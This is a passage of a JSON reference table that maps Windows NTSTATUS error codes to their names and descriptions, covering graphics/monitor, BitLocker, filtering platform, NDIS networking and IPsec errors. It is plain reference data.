monitor.\"\n        },\n        \"c01e0587\": {\n            \"code\": \"STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING\",\n            \"description\": \"A monitor returned a DDC/CI capabilities string that did not comply with the ACCESS.bus 3.0, DDC/CI 1.1, or MCCS 2 Revision 1 specification.\"\n        },\n        \"c01e0588\": {\n            \"code\": \"STATUS_GRAPHICS_MCA_INTERNAL_ERROR\",\n            \"description\": \"An internal error caused an operation to fail.\"\n        },\n        \"c01e0589\": {\n            \"code\": \"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND\",\n            \"description\": \"An operation failed because a DDC/CI message had an invalid value in its command field.\"\n        },\n        \"c01e058a\": {\n            \"code\": \"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH\",\n            \"description\": \"This error occurred because a DDC/CI message had an invalid value in its length field.\"\n        },\n        \"c01e058b\": {\n            \"code\": \"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM\",\n            \"description\": \"This error occurred because the value in a DDC/CI message's checksum field did not match the message's computed checksum value. This error implies that the data was corrupted while it was being transmitted from a monitor to a computer.\"\n        },\n        \"c01e058c\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE\",\n            \"description\": \"This function failed because an invalid monitor handle was passed to it.\"\n        },\n        \"c01e058d\": {\n            \"code\": \"STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS\",\n            \"description\": \"The operating system asynchronously destroyed the monitor that corresponds to this handle because the operating system's state changed. This error typically occurs because the monitor PDO associated with this handle was removed or stopped, or a display mode change occurred. A display mode change occurs when Windows sends a WM_DISPLAYCHANGE message to applications.\"\n        },\n        \"c01e05e0\": {\n            \"code\": \"STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED\",\n            \"description\": \"This function can be used only if a program is running in the local console session. It cannot be used if a program is running on a remote desktop session or on a terminal server session.\"\n        },\n        \"c01e05e1\": {\n            \"code\": \"STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME\",\n            \"description\": \"This function cannot find an actual GDI display device that corresponds to the specified GDI display device name.\"\n        },\n        \"c01e05e2\": {\n            \"code\": \"STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP\",\n            \"description\": \"The function failed because the specified GDI display device was not attached to the Windows desktop.\"\n        },\n        \"c01e05e3\": {\n            \"code\": \"STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED\",\n            \"description\": \"This function does not support GDI mirroring display devices because GDI mirroring display devices do not have any physical monitors associated with them.\"\n        },\n        \"c01e05e4\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_POINTER\",\n            \"description\": \"The function failed because an invalid pointer parameter was passed to it. A pointer parameter is invalid if it is null, is not correctly aligned, or points to an invalid address or to a kernel mode address.\"\n        },\n        \"c01e05e5\": {\n            \"code\": \"STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE\",\n            \"description\": \"This function failed because the GDI device passed to it did not have a monitor associated with it.\"\n        },\n        \"c01e05e6\": {\n            \"code\": \"STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL\",\n            \"description\": \"An array passed to the function cannot hold all of the data that the function must copy into the array.\"\n        },\n        \"c01e05e7\": {\n            \"code\": \"STATUS_GRAPHICS_INTERNAL_ERROR\",\n            \"description\": \"An internal error caused an operation to fail.\"\n        },\n        \"c01e05e8\": {\n            \"code\": \"STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS\",\n            \"description\": \"The function failed because the current session is changing its type. This function cannot be called when the current session is changing its type. Three types of sessions currently exist: console, disconnected, and remote (RDP or ICA).\"\n        },\n        \"c0210000\": {\n            \"code\": \"STATUS_FVE_LOCKED_VOLUME\",\n            \"description\": \"The volume must be unlocked before it can be used.\"\n        },\n        \"c0210001\": {\n            \"code\": \"STATUS_FVE_NOT_ENCRYPTED\",\n            \"description\": \"The volume is fully decrypted and no key is available.\"\n        },\n        \"c0210002\": {\n            \"code\": \"STATUS_FVE_BAD_INFORMATION\",\n            \"description\": \"The control block for the encrypted volume is not valid.\"\n        },\n        \"c0210003\": {\n            \"code\": \"STATUS_FVE_TOO_SMALL\",\n            \"description\": \"Not enough free space remains on the volume to allow encryption.\"\n        },\n        \"c0210004\": {\n            \"code\": \"STATUS_FVE_FAILED_WRONG_FS\",\n            \"description\": \"The partition cannot be encrypted because the file system is not supported.\"\n        },\n        \"c0210005\": {\n            \"code\": \"STATUS_FVE_FAILED_BAD_FS\",\n            \"description\": \"The file system is inconsistent. Run the Check Disk utility.\"\n        },\n        \"c0210006\": {\n            \"code\": \"STATUS_FVE_FS_NOT_EXTENDED\",\n            \"description\": \"The file system does not extend to the end of the volume.\"\n        },\n        \"c0210007\": {\n            \"code\": \"STATUS_FVE_FS_MOUNTED\",\n            \"description\": \"This operation cannot be performed while a file system is mounted on the volume.\"\n        },\n        \"c0210008\": {\n            \"code\": \"STATUS_FVE_NO_LICENSE\",\n            \"description\": \"BitLocker Drive Encryption is not included with this version of Windows.\"\n        },\n        \"c0210009\": {\n            \"code\": \"STATUS_FVE_ACTION_NOT_ALLOWED\",\n            \"description\": \"The requested action was denied by the FVE control engine.\"\n        },\n        \"c021000a\": {\n            \"code\": \"STATUS_FVE_BAD_DATA\",\n            \"description\": \"The data supplied is malformed.\"\n        },\n        \"c021000b\": {\n            \"code\": \"STATUS_FVE_VOLUME_NOT_BOUND\",\n            \"description\": \"The volume is not bound to the system.\"\n        },\n        \"c021000c\": {\n            \"code\": \"STATUS_FVE_NOT_DATA_VOLUME\",\n            \"description\": \"The volume specified is not a data volume.\"\n        },\n        \"c021000d\": {\n            \"code\": \"STATUS_FVE_CONV_READ_ERROR\",\n            \"description\": \"A read operation failed while converting the volume.\"\n        },\n        \"c021000e\": {\n            \"code\": \"STATUS_FVE_CONV_WRITE_ERROR\",\n            \"description\": \"A write operation failed while converting the volume.\"\n        },\n        \"c021000f\": {\n            \"code\": \"STATUS_FVE_OVERLAPPED_UPDATE\",\n            \"description\": \"The control block for the encrypted volume was updated by another thread. Try again.\"\n        },\n        \"c0210010\": {\n            \"code\": \"STATUS_FVE_FAILED_SECTOR_SIZE\",\n            \"description\": \"The volume encryption algorithm cannot be used on this sector size.\"\n        },\n        \"c0210011\": {\n            \"code\": \"STATUS_FVE_FAILED_AUTHENTICATION\",\n            \"description\": \"BitLocker recovery authentication failed.\"\n        },\n        \"c0210012\": {\n            \"code\": \"STATUS_FVE_NOT_OS_VOLUME\",\n            \"description\": \"The volume specified is not the boot operating system volume.\"\n        },\n        \"c0210013\": {\n            \"code\": \"STATUS_FVE_KEYFILE_NOT_FOUND\",\n            \"description\": \"The BitLocker startup key or recovery password could not be read from external media.\"\n        },\n        \"c0210014\": {\n            \"code\": \"STATUS_FVE_KEYFILE_INVALID\",\n            \"description\": \"The BitLocker startup key or recovery password file is corrupt or invalid.\"\n        },\n        \"c0210015\": {\n            \"code\": \"STATUS_FVE_KEYFILE_NO_VMK\",\n            \"description\": \"The BitLocker encryption key could not be obtained from the startup key or the recovery password.\"\n        },\n        \"c0210016\": {\n            \"code\": \"STATUS_FVE_TPM_DISABLED\",\n            \"description\": \"The TPM is disabled.\"\n        },\n        \"c0210017\": {\n            \"code\": \"STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO\",\n            \"description\": \"The authorization data for the SRK of the TPM is not zero.\"\n        },\n        \"c0210018\": {\n            \"code\": \"STATUS_FVE_TPM_INVALID_PCR\",\n            \"description\": \"The system boot information changed or the TPM locked out access to BitLocker encryption keys until the computer is restarted.\"\n        },\n        \"c0210019\": {\n            \"code\": \"STATUS_FVE_TPM_NO_VMK\",\n            \"description\": \"The BitLocker encryption key could not be obtained from the TPM.\"\n        },\n        \"c021001a\": {\n            \"code\": \"STATUS_FVE_PIN_INVALID\",\n            \"description\": \"The BitLocker encryption key could not be obtained from the TPM and PIN.\"\n        },\n        \"c021001b\": {\n            \"code\": \"STATUS_FVE_AUTH_INVALID_APPLICATION\",\n            \"description\": \"A boot application hash does not match the hash computed when BitLocker was turned on.\"\n        },\n        \"c021001c\": {\n            \"code\": \"STATUS_FVE_AUTH_INVALID_CONFIG\",\n            \"description\": \"The Boot Configuration Data (BCD) settings are not supported or have changed because BitLocker was enabled.\"\n        },\n        \"c021001d\": {\n            \"code\": \"STATUS_FVE_DEBUGGER_ENABLED\",\n            \"description\": \"Boot debugging is enabled. Run Windows Boot Configuration Data Store Editor (bcdedit.exe) to turn it off.\"\n        },\n        \"c021001e\": {\n            \"code\": \"STATUS_FVE_DRY_RUN_FAILED\",\n            \"description\": \"The BitLocker encryption key could not be obtained.\"\n        },\n        \"c021001f\": {\n            \"code\": \"STATUS_FVE_BAD_METADATA_POINTER\",\n            \"description\": \"The metadata disk region pointer is incorrect.\"\n        },\n        \"c0210020\": {\n            \"code\": \"STATUS_FVE_OLD_METADATA_COPY\",\n            \"description\": \"The backup copy of the metadata is out of date.\"\n        },\n        \"c0210021\": {\n            \"code\": \"STATUS_FVE_REBOOT_REQUIRED\",\n            \"description\": \"No action was taken because a system restart is required.\"\n        },\n        \"c0210022\": {\n            \"code\": \"STATUS_FVE_RAW_ACCESS\",\n            \"description\": \"No action was taken because BitLocker Drive Encryption is in RAW access mode.\"\n        },\n        \"c0210023\": {\n            \"code\": \"STATUS_FVE_RAW_BLOCKED\",\n            \"description\": \"BitLocker Drive Encryption cannot enter RAW access mode for this volume.\"\n        },\n        \"c0210026\": {\n            \"code\": \"STATUS_FVE_NO_FEATURE_LICENSE\",\n            \"description\": \"This feature of BitLocker Drive Encryption is not included with this version of Windows.\"\n        },\n        \"c0210027\": {\n            \"code\": \"STATUS_FVE_POLICY_USER_DISABLE_RDV_NOT_ALLOWED\",\n            \"description\": \"Group policy does not permit turning off BitLocker Drive Encryption on roaming data volumes.\"\n        },\n        \"c0210028\": {\n            \"code\": \"STATUS_FVE_CONV_RECOVERY_FAILED\",\n            \"description\": \"Bitlocker Drive Encryption failed to recover from aborted conversion. This could be due to either all conversion logs being corrupted or the media being write-protected.\"\n        },\n        \"c0210029\": {\n            \"code\": \"STATUS_FVE_VIRTUALIZED_SPACE_TOO_BIG\",\n            \"description\": \"The requested virtualization size is too big.\"\n        },\n        \"c0210030\": {\n            \"code\": \"STATUS_FVE_VOLUME_TOO_SMALL\",\n            \"description\": \"The drive is too small to be protected using BitLocker Drive Encryption.\"\n        },\n        \"c0220001\": {\n            \"code\": \"STATUS_FWP_CALLOUT_NOT_FOUND\",\n            \"description\": \"The callout does not exist.\"\n        },\n        \"c0220002\": {\n            \"code\": \"STATUS_FWP_CONDITION_NOT_FOUND\",\n            \"description\": \"The filter condition does not exist.\"\n        },\n        \"c0220003\": {\n            \"code\": \"STATUS_FWP_FILTER_NOT_FOUND\",\n            \"description\": \"The filter does not exist.\"\n        },\n        \"c0220004\": {\n            \"code\": \"STATUS_FWP_LAYER_NOT_FOUND\",\n            \"description\": \"The layer does not exist.\"\n        },\n        \"c0220005\": {\n            \"code\": \"STATUS_FWP_PROVIDER_NOT_FOUND\",\n            \"description\": \"The provider does not exist.\"\n        },\n        \"c0220006\": {\n            \"code\": \"STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND\",\n            \"description\": \"The provider context does not exist.\"\n        },\n        \"c0220007\": {\n            \"code\": \"STATUS_FWP_SUBLAYER_NOT_FOUND\",\n            \"description\": \"The sublayer does not exist.\"\n        },\n        \"c0220008\": {\n            \"code\": \"STATUS_FWP_NOT_FOUND\",\n            \"description\": \"The object does not exist.\"\n        },\n        \"c0220009\": {\n            \"code\": \"STATUS_FWP_ALREADY_EXISTS\",\n            \"description\": \"An object with that GUID or LUID already exists.\"\n        },\n        \"c022000a\": {\n            \"code\": \"STATUS_FWP_IN_USE\",\n            \"description\": \"The object is referenced by other objects and cannot be deleted.\"\n        },\n        \"c022000b\": {\n            \"code\": \"STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS\",\n            \"description\": \"The call is not allowed from within a dynamic session.\"\n        },\n        \"c022000c\": {\n            \"code\": \"STATUS_FWP_WRONG_SESSION\",\n            \"description\": \"The call was made from the wrong session and cannot be completed.\"\n        },\n        \"c022000d\": {\n            \"code\": \"STATUS_FWP_NO_TXN_IN_PROGRESS\",\n            \"description\": \"The call must be made from within an explicit transaction.\"\n        },\n        \"c022000e\": {\n            \"code\": \"STATUS_FWP_TXN_IN_PROGRESS\",\n            \"description\": \"The call is not allowed from within an explicit transaction.\"\n        },\n        \"c022000f\": {\n            \"code\": \"STATUS_FWP_TXN_ABORTED\",\n            \"description\": \"The explicit transaction has been forcibly canceled.\"\n        },\n        \"c0220010\": {\n            \"code\": \"STATUS_FWP_SESSION_ABORTED\",\n            \"description\": \"The session has been canceled.\"\n        },\n        \"c0220011\": {\n            \"code\": \"STATUS_FWP_INCOMPATIBLE_TXN\",\n            \"description\": \"The call is not allowed from within a read-only transaction.\"\n        },\n        \"c0220012\": {\n            \"code\": \"STATUS_FWP_TIMEOUT\",\n            \"description\": \"The call timed out while waiting to acquire the transaction lock.\"\n        },\n        \"c0220013\": {\n            \"code\": \"STATUS_FWP_NET_EVENTS_DISABLED\",\n            \"description\": \"The collection of network diagnostic events is disabled.\"\n        },\n        \"c0220014\": {\n            \"code\": \"STATUS_FWP_INCOMPATIBLE_LAYER\",\n            \"description\": \"The operation is not supported by the specified layer.\"\n        },\n        \"c0220015\": {\n            \"code\": \"STATUS_FWP_KM_CLIENTS_ONLY\",\n            \"description\": \"The call is allowed for kernel-mode callers only.\"\n        },\n        \"c0220016\": {\n            \"code\": \"STATUS_FWP_LIFETIME_MISMATCH\",\n            \"description\": \"The call tried to associate two objects with incompatible lifetimes.\"\n        },\n        \"c0220017\": {\n            \"code\": \"STATUS_FWP_BUILTIN_OBJECT\",\n            \"description\": \"The object is built-in and cannot be deleted.\"\n        },\n        \"c0220018\": {\n            \"code\": \"STATUS_FWP_TOO_MANY_CALLOUTS\",\n            \"description\": \"The maximum number of callouts has been reached.\"\n        },\n        \"c0220019\": {\n            \"code\": \"STATUS_FWP_NOTIFICATION_DROPPED\",\n            \"description\": \"A notification could not be delivered because a message queue has reached maximum capacity.\"\n        },\n        \"c022001a\": {\n            \"code\": \"STATUS_FWP_TRAFFIC_MISMATCH\",\n            \"description\": \"The traffic parameters do not match those for the security association context.\"\n        },\n        \"c022001b\": {\n            \"code\": \"STATUS_FWP_INCOMPATIBLE_SA_STATE\",\n            \"description\": \"The call is not allowed for the current security association state.\"\n        },\n        \"c022001c\": {\n            \"code\": \"STATUS_FWP_NULL_POINTER\",\n            \"description\": \"A required pointer is null.\"\n        },\n        \"c022001d\": {\n            \"code\": \"STATUS_FWP_INVALID_ENUMERATOR\",\n            \"description\": \"An enumerator is not valid.\"\n        },\n        \"c022001e\": {\n            \"code\": \"STATUS_FWP_INVALID_FLAGS\",\n            \"description\": \"The flags field contains an invalid value.\"\n        },\n        \"c022001f\": {\n            \"code\": \"STATUS_FWP_INVALID_NET_MASK\",\n            \"description\": \"A network mask is not valid.\"\n        },\n        \"c0220020\": {\n            \"code\": \"STATUS_FWP_INVALID_RANGE\",\n            \"description\": \"An FWP_RANGE is not valid.\"\n        },\n        \"c0220021\": {\n            \"code\": \"STATUS_FWP_INVALID_INTERVAL\",\n            \"description\": \"The time interval is not valid.\"\n        },\n        \"c0220022\": {\n            \"code\": \"STATUS_FWP_ZERO_LENGTH_ARRAY\",\n            \"description\": \"An array that must contain at least one element has a zero length.\"\n        },\n        \"c0220023\": {\n            \"code\": \"STATUS_FWP_NULL_DISPLAY_NAME\",\n            \"description\": \"The displayData.name field cannot be null.\"\n        },\n        \"c0220024\": {\n            \"code\": \"STATUS_FWP_INVALID_ACTION_TYPE\",\n            \"description\": \"The action type is not one of the allowed action types for a filter.\"\n        },\n        \"c0220025\": {\n            \"code\": \"STATUS_FWP_INVALID_WEIGHT\",\n            \"description\": \"The filter weight is not valid.\"\n        },\n        \"c0220026\": {\n            \"code\": \"STATUS_FWP_MATCH_TYPE_MISMATCH\",\n            \"description\": \"A filter condition contains a match type that is not compatible with the operands.\"\n        },\n        \"c0220027\": {\n            \"code\": \"STATUS_FWP_TYPE_MISMATCH\",\n            \"description\": \"An FWP_VALUE or FWPM_CONDITION_VALUE is of the wrong type.\"\n        },\n        \"c0220028\": {\n            \"code\": \"STATUS_FWP_OUT_OF_BOUNDS\",\n            \"description\": \"An integer value is outside the allowed range.\"\n        },\n        \"c0220029\": {\n            \"code\": \"STATUS_FWP_RESERVED\",\n            \"description\": \"A reserved field is nonzero.\"\n        },\n        \"c022002a\": {\n            \"code\": \"STATUS_FWP_DUPLICATE_CONDITION\",\n            \"description\": \"A filter cannot contain multiple conditions operating on a single field.\"\n        },\n        \"c022002b\": {\n            \"code\": \"STATUS_FWP_DUPLICATE_KEYMOD\",\n            \"description\": \"A policy cannot contain the same keying module more than once.\"\n        },\n        \"c022002c\": {\n            \"code\": \"STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER\",\n            \"description\": \"The action type is not compatible with the layer.\"\n        },\n        \"c022002d\": {\n            \"code\": \"STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER\",\n            \"description\": \"The action type is not compatible with the sublayer.\"\n        },\n        \"c022002e\": {\n            \"code\": \"STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER\",\n            \"description\": \"The raw context or the provider context is not compatible with the layer.\"\n        },\n        \"c022002f\": {\n            \"code\": \"STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT\",\n            \"description\": \"The raw context or the provider context is not compatible with the callout.\"\n        },\n        \"c0220030\": {\n            \"code\": \"STATUS_FWP_INCOMPATIBLE_AUTH_METHOD\",\n            \"description\": \"The authentication method is not compatible with the policy type.\"\n        },\n        \"c0220031\": {\n            \"code\": \"STATUS_FWP_INCOMPATIBLE_DH_GROUP\",\n            \"description\": \"The Diffie-Hellman group is not compatible with the policy type.\"\n        },\n        \"c0220032\": {\n            \"code\": \"STATUS_FWP_EM_NOT_SUPPORTED\",\n            \"description\": \"An IKE policy cannot contain an Extended Mode policy.\"\n        },\n        \"c0220033\": {\n            \"code\": \"STATUS_FWP_NEVER_MATCH\",\n            \"description\": \"The enumeration template or subscription will never match any objects.\"\n        },\n        \"c0220034\": {\n            \"code\": \"STATUS_FWP_PROVIDER_CONTEXT_MISMATCH\",\n            \"description\": \"The provider context is of the wrong type.\"\n        },\n        \"c0220035\": {\n            \"code\": \"STATUS_FWP_INVALID_PARAMETER\",\n            \"description\": \"The parameter is incorrect.\"\n        },\n        \"c0220036\": {\n            \"code\": \"STATUS_FWP_TOO_MANY_SUBLAYERS\",\n            \"description\": \"The maximum number of sublayers has been reached.\"\n        },\n        \"c0220037\": {\n            \"code\": \"STATUS_FWP_CALLOUT_NOTIFICATION_FAILED\",\n            \"description\": \"The notification function for a callout returned an error.\"\n        },\n        \"c0220038\": {\n            \"code\": \"STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG\",\n            \"description\": \"The IPsec authentication configuration is not compatible with the authentication type.\"\n        },\n        \"c0220039\": {\n            \"code\": \"STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG\",\n            \"description\": \"The IPsec cipher configuration is not compatible with the cipher type.\"\n        },\n        \"c022003c\": {\n            \"code\": \"STATUS_FWP_DUPLICATE_AUTH_METHOD\",\n            \"description\": \"A policy cannot contain the same auth method more than once.\"\n        },\n        \"c0220100\": {\n            \"code\": \"STATUS_FWP_TCPIP_NOT_READY\",\n            \"description\": \"The TCP/IP stack is not ready.\"\n        },\n        \"c0220101\": {\n            \"code\": \"STATUS_FWP_INJECT_HANDLE_CLOSING\",\n            \"description\": \"The injection handle is being closed by another thread.\"\n        },\n        \"c0220102\": {\n            \"code\": \"STATUS_FWP_INJECT_HANDLE_STALE\",\n            \"description\": \"The injection handle is stale.\"\n        },\n        \"c0220103\": {\n            \"code\": \"STATUS_FWP_CANNOT_PEND\",\n            \"description\": \"The classify cannot be pended.\"\n        },\n        \"c0230002\": {\n            \"code\": \"STATUS_NDIS_CLOSING\",\n            \"description\": \"The binding to the network interface is being closed.\"\n        },\n        \"c0230004\": {\n            \"code\": \"STATUS_NDIS_BAD_VERSION\",\n            \"description\": \"An invalid version was specified.\"\n        },\n        \"c0230005\": {\n            \"code\": \"STATUS_NDIS_BAD_CHARACTERISTICS\",\n            \"description\": \"An invalid characteristics table was used.\"\n        },\n        \"c0230006\": {\n            \"code\": \"STATUS_NDIS_ADAPTER_NOT_FOUND\",\n            \"description\": \"Failed to find the network interface or the network interface is not ready.\"\n        },\n        \"c0230007\": {\n            \"code\": \"STATUS_NDIS_OPEN_FAILED\",\n            \"description\": \"Failed to open the network interface.\"\n        },\n        \"c0230008\": {\n            \"code\": \"STATUS_NDIS_DEVICE_FAILED\",\n            \"description\": \"The network interface has encountered an internal unrecoverable failure.\"\n        },\n        \"c0230009\": {\n            \"code\": \"STATUS_NDIS_MULTICAST_FULL\",\n            \"description\": \"The multicast list on the network interface is full.\"\n        },\n        \"c023000a\": {\n            \"code\": \"STATUS_NDIS_MULTICAST_EXISTS\",\n            \"description\": \"An attempt was made to add a duplicate multicast address to the list.\"\n        },\n        \"c023000b\": {\n            \"code\": \"STATUS_NDIS_MULTICAST_NOT_FOUND\",\n            \"description\": \"At attempt was made to remove a multicast address that was never added.\"\n        },\n        \"c023000c\": {\n            \"code\": \"STATUS_NDIS_REQUEST_ABORTED\",\n            \"description\": \"The network interface aborted the request.\"\n        },\n        \"c023000d\": {\n            \"code\": \"STATUS_NDIS_RESET_IN_PROGRESS\",\n            \"description\": \"The network interface cannot process the request because it is being reset.\"\n        },\n        \"c023000f\": {\n            \"code\": \"STATUS_NDIS_INVALID_PACKET\",\n            \"description\": \"An attempt was made to send an invalid packet on a network interface.\"\n        },\n        \"c0230010\": {\n            \"code\": \"STATUS_NDIS_INVALID_DEVICE_REQUEST\",\n            \"description\": \"The specified request is not a valid operation for the target device.\"\n        },\n        \"c0230011\": {\n            \"code\": \"STATUS_NDIS_ADAPTER_NOT_READY\",\n            \"description\": \"The network interface is not ready to complete this operation.\"\n        },\n        \"c0230014\": {\n            \"code\": \"STATUS_NDIS_INVALID_LENGTH\",\n            \"description\": \"The length of the buffer submitted for this operation is not valid.\"\n        },\n        \"c0230015\": {\n            \"code\": \"STATUS_NDIS_INVALID_DATA\",\n            \"description\": \"The data used for this operation is not valid.\"\n        },\n        \"c0230016\": {\n            \"code\": \"STATUS_NDIS_BUFFER_TOO_SHORT\",\n            \"description\": \"The length of the submitted buffer for this operation is too small.\"\n        },\n        \"c0230017\": {\n            \"code\": \"STATUS_NDIS_INVALID_OID\",\n            \"description\": \"The network interface does not support this object identifier.\"\n        },\n        \"c0230018\": {\n            \"code\": \"STATUS_NDIS_ADAPTER_REMOVED\",\n            \"description\": \"The network interface has been removed.\"\n        },\n        \"c0230019\": {\n            \"code\": \"STATUS_NDIS_UNSUPPORTED_MEDIA\",\n            \"description\": \"The network interface does not support this media type.\"\n        },\n        \"c023001a\": {\n            \"code\": \"STATUS_NDIS_GROUP_ADDRESS_IN_USE\",\n            \"description\": \"An attempt was made to remove a token ring group address that is in use by other components.\"\n        },\n        \"c023001b\": {\n            \"code\": \"STATUS_NDIS_FILE_NOT_FOUND\",\n            \"description\": \"An attempt was made to map a file that cannot be found.\"\n        },\n        \"c023001c\": {\n            \"code\": \"STATUS_NDIS_ERROR_READING_FILE\",\n            \"description\": \"An error occurred while NDIS tried to map the file.\"\n        },\n        \"c023001d\": {\n            \"code\": \"STATUS_NDIS_ALREADY_MAPPED\",\n            \"description\": \"An attempt was made to map a file that is already mapped.\"\n        },\n        \"c023001e\": {\n            \"code\": \"STATUS_NDIS_RESOURCE_CONFLICT\",\n            \"description\": \"An attempt to allocate a hardware resource failed because the resource is used by another component.\"\n        },\n        \"c023001f\": {\n            \"code\": \"STATUS_NDIS_MEDIA_DISCONNECTED\",\n            \"description\": \"The I/O operation failed because the network media is disconnected or the wireless access point is out of range.\"\n        },\n        \"c0230022\": {\n            \"code\": \"STATUS_NDIS_INVALID_ADDRESS\",\n            \"description\": \"The network address used in the request is invalid.\"\n        },\n        \"c023002a\": {\n            \"code\": \"STATUS_NDIS_PAUSED\",\n            \"description\": \"The offload operation on the network interface has been paused.\"\n        },\n        \"c023002b\": {\n            \"code\": \"STATUS_NDIS_INTERFACE_NOT_FOUND\",\n            \"description\": \"The network interface was not found.\"\n        },\n        \"c023002c\": {\n            \"code\": \"STATUS_NDIS_UNSUPPORTED_REVISION\",\n            \"description\": \"The revision number specified in the structure is not supported.\"\n        },\n        \"c023002d\": {\n            \"code\": \"STATUS_NDIS_INVALID_PORT\",\n            \"description\": \"The specified port does not exist on this network interface.\"\n        },\n        \"c023002e\": {\n            \"code\": \"STATUS_NDIS_INVALID_PORT_STATE\",\n            \"description\": \"The current state of the specified port on this network interface does not support the requested operation.\"\n        },\n        \"c023002f\": {\n            \"code\": \"STATUS_NDIS_LOW_POWER_STATE\",\n            \"description\": \"The miniport adapter is in a lower power state.\"\n        },\n        \"c02300bb\": {\n            \"code\": \"STATUS_NDIS_NOT_SUPPORTED\",\n            \"description\": \"The network interface does not support this request.\"\n        },\n        \"c023100f\": {\n            \"code\": \"STATUS_NDIS_OFFLOAD_POLICY\",\n            \"description\": \"The TCP connection is not offloadable because of a local policy setting.\"\n        },\n        \"c0231012\": {\n            \"code\": \"STATUS_NDIS_OFFLOAD_CONNECTION_REJECTED\",\n            \"description\": \"The TCP connection is not offloadable by the Chimney offload target.\"\n        },\n        \"c0231013\": {\n            \"code\": \"STATUS_NDIS_OFFLOAD_PATH_REJECTED\",\n            \"description\": \"The IP Path object is not in an offloadable state.\"\n        },\n        \"c0232000\": {\n            \"code\": \"STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED\",\n            \"description\": \"The wireless LAN interface is in auto-configuration mode and does not support the requested parameter change operation.\"\n        },\n        \"c0232001\": {\n            \"code\": \"STATUS_NDIS_DOT11_MEDIA_IN_USE\",\n            \"description\": \"The wireless LAN interface is busy and cannot perform the requested operation.\"\n        },\n        \"c0232002\": {\n            \"code\": \"STATUS_NDIS_DOT11_POWER_STATE_INVALID\",\n            \"description\": \"The wireless LAN interface is power down and does not support the requested operation.\"\n        },\n        \"c0232003\": {\n            \"code\": \"STATUS_NDIS_PM_WOL_PATTERN_LIST_FULL\",\n            \"description\": \"The list of wake on LAN patterns is full.\"\n        },\n        \"c0232004\": {\n            \"code\": \"STATUS_NDIS_PM_PROTOCOL_OFFLOAD_LIST_FULL\",\n            \"description\": \"The list of low power protocol offloads is full.\"\n        },\n        \"c0360001\": {\n            \"code\": \"STATUS_IPSEC_BAD_SPI\",\n            \"description\": \"The SPI in the packet does not match a valid IPsec SA.\"\n        },\n        \"c0360002\": {\n            \"code\": \"STATUS_IPSEC_SA_LIFETIME_EXPIRED\",\n            \"description\": \"The packet was received on an IPsec SA whose lifetime has expired.\"\n        },\n        \"c0360003\": {\n            \"code\": \"STATUS_IPSEC_WRONG_SA\",\n            \"description\": \"The packet was received on an IPsec SA that does not match the packet characteristics.\"\n        },\n        \"c0360004\": {\n            \"code\": \"STATUS_IPSEC_REPLAY_CHECK_FAILED\",\n            \"description\": \"The packet sequence number replay check failed.\"\n        },\n        \"c0360005\": {\n            \"code\": \"STATUS_IPSEC_INVALID_PACKET\",\n            \"description\": \"The IPsec header and/or trailer in the packet is invalid.\"\n        },\n        \"c0360006\": {\n            \"code\": \"STATUS_IPSEC_INTEGRITY_CHECK_FAILED\",\n            \"description\": \"The IPsec integrity check failed.\"\n        },\n        \"c0360007\": {\n            \"code\": \"STATUS_IPSEC_CLEAR_TEXT_DROP\",\n            \"description\": \"IPsec dropped a clear text packet.\"\n        },\n        \"c0360008\": {\n            \"code\": \"STATUS_IPSEC_AUTH_FIREWALL_DROP\",\n            \"description\": \"IPsec dropped an incoming ESP packet in authenticated firewall mode.  This drop is benign.\"\n        },\n        \"c0360009\": {\n            \"code\": \"STATUS_IPSEC_THROTTLE_DROP\",\n            \"description\": \"IPsec dropped a packet due to DOS throttle.\"\n        },\n        \"c0368000\": {\n            \"code\": \"STATUS_IPSEC_DOSP_BLOCK\",\n            \"description\": \"IPsec Dos Protection matched an explicit block rule.\"\n        },\n        \"c0368001\": {\n            \"code\": \"STATUS_IPSEC_DOSP_RECEIVED_MULTICAST\",\n            \"description\": \"IPsec Dos Protection received an IPsec specific multicast packet which is not allowed.\"\n        },\n        \"c0368002\": {\n            \"code\": \"STATUS_IPSEC_DOSP_INVALID_PACKET\",\n            \"description\": \"IPsec Dos Protection received an incorrectly formatted packet.\"\n        },\n        \"c0368003\": {\n            \"code\": \"STATUS_IPSEC_DOSP_STATE_LOOKUP_FAILED\",\n            \"description\": \"IPsec Dos Protection failed to lookup state.\"\n        },\n        \"c0368004\": {\n            \"code\": \"STATUS_IPSEC_DOSP_MAX_ENTRIES\",\n            \"description\": \"IPsec Dos Protection failed to create state because there are already maximum number of entries allowed by policy.\"\n        },\n        \"c0368005\": {\n            \"code\": \"STATUS_IPSEC_DOSP_KEYMOD_NOT_ALLOWED\",\n            \"description\": \"IPsec Dos Protection received an IPsec negotiation packet for a keying module which is not allowed by policy.\"\n        },\n        \"c0368006\": {\n            \"code\": \"STATUS_IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES\",\n            \"description\": \"IPsec Dos Protection failed to create per internal IP ratelimit queue because there is already maximum number of queues allowed by policy.\"\n        },\n        \"c038005b\": {\n            \"code\": \"STATUS_VOLMGR_MIRROR_NOT_SUPPORTED\",\n         